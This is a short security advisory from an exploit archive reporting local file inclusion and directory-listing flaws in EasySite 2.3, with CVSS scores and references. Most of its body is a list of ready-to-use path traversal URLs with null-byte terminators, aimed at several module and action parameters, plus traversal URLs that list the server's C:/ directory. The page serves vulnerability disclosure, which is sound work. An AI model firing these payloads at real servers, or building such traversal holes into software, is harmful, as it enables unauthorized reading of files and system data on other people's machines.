EasySite 2.3 Multiple Remote Vulnerabilities

2008.09.22
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

#################################################################### [+] EasySite v2.3 Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] www.mortal-team.org [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN #################################################################### [+] Local File Inclusion http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00 http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00 http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00 http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00 http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00 http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00 http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00 And many others... This will open autoexec.bat [+] Arbitrary View Folder Contents You can view the folder contents and the content of files view via LFI. http://localhost/www/index.php?module=../../../ http://localhost/inc/vmenu.php?module=../../../ This will open C:/ directory and will show all the files from C:/ . Example : * BOOTSECT.BAK * BcBtRmv.log * IO.SYS * MSDOS.SYS * autoexec.bat * bootmgr * config.sys * grldr * hiberfil.sys * pagefile.sys ####################################################################

References:

http://www.securityfocus.com/bid/30784
http://www.milw0rm.com/exploits/6288


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top